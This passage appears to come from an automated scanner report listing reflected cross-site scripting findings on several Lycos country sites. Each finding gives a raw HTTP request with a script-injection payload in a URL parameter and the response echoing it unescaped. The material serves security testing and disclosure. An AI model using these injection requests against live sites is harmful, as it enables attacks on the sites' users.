Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?utm_source=lycoshome7650e"><script>alert(1)</script>91f57f72591&utm_campaign=home_flags&utm_medium=footer HTTP/1.1
Host: www.lycos.at
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R3839809267; path=/
Date: Mon, 07 Feb 2011 14:52:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:33 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="de">
<head>
<title>Lycos</
...[SNIP]...
<a href="/?utm_source=lycoshome7650e"><script>alert(1)</script>91f57f72591&utm_campaign=home_flags&utm_medium=footer&diktfc=D06EED63D740C9F1A7C6CD2B58B3ACE95D4FCCDBEF77&mobile=1">
...[SNIP]...

1.303. http://www.lycos.be/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lycos.be
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3ee9"><script>alert(1)</script>5cb537d5b45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?c3ee9"><script>alert(1)</script>5cb537d5b45=1 HTTP/1.1
Host: www.lycos.be
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R1161732309; path=/
Date: Mon, 07 Feb 2011 14:52:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:32 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl">
<head>
<title>Lycos</
...[SNIP]...
<a href="/?c3ee9"><script>alert(1)</script>5cb537d5b45=1&diktfc=97E5EB835B279BB13FE34B032A5C9AC1EFCA968FE872&mobile=1">
...[SNIP]...

1.304. http://www.lycos.be/ [utm_campaign parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lycos.be
Path:   /

Issue detail

The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a857c"><script>alert(1)</script>736e3f921fe was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?utm_source=lycoshome&utm_campaign=home_flagsa857c"><script>alert(1)</script>736e3f921fe&utm_medium=footer HTTP/1.1
Host: www.lycos.be
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R3839836492; path=/
Date: Mon, 07 Feb 2011 14:52:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:39 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl">
<head>
<title>Lycos</
...[SNIP]...
<a href="/?utm_source=lycoshome&utm_campaign=home_flagsa857c"><script>alert(1)</script>736e3f921fe&utm_medium=footer&diktfc=623DAA5AA63790B00C336C9EA20D19C6CCF52C9D1345&mobile=1">
...[SNIP]...

1.305. http://www.lycos.be/ [utm_medium parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lycos.be
Path:   /

Issue detail

The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1e80"><script>alert(1)</script>e545848e758 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footerd1e80"><script>alert(1)</script>e545848e758 HTTP/1.1
Host: www.lycos.be
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R1161729042; path=/
Date: Mon, 07 Feb 2011 14:52:44 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:44 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl">
<head>
<title>Lycos</
...[SNIP]...
<a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footerd1e80"><script>alert(1)</script>e545848e758&diktfc=B40089EC36E5DAC56A7BB40F7A2916D2885AE607D69F&mobile=1">
...[SNIP]...

1.306. http://www.lycos.be/ [utm_source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lycos.be
Path:   /

Issue detail

The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d00a2"><script>alert(1)</script>8120a6d457e was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?utm_source=lycoshomed00a2"><script>alert(1)</script>8120a6d457e&utm_campaign=home_flags&utm_medium=footer HTTP/1.1
Host: www.lycos.be
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R3839804911; path=/
Date: Mon, 07 Feb 2011 14:52:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:33 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl">
<head>
<title>Lycos</
...[SNIP]...
<a href="/?utm_source=lycoshomed00a2"><script>alert(1)</script>8120a6d457e&utm_campaign=home_flags&utm_medium=footer&diktfc=BBA1BC2FA21FEDA918DBB104CC41AFAF4F849834F42E&mobile=1">
...[SNIP]...

1.307. http://www.lycos.ca/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lycos.ca
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f7ab"><script>alert(1)</script>4d893273fa2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?2f7ab"><script>alert(1)</script>4d893273fa2=1 HTTP/1.1
Host: www.lycos.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R3839802733; path=/
Date: Mon, 07 Feb 2011 14:52:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:32 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.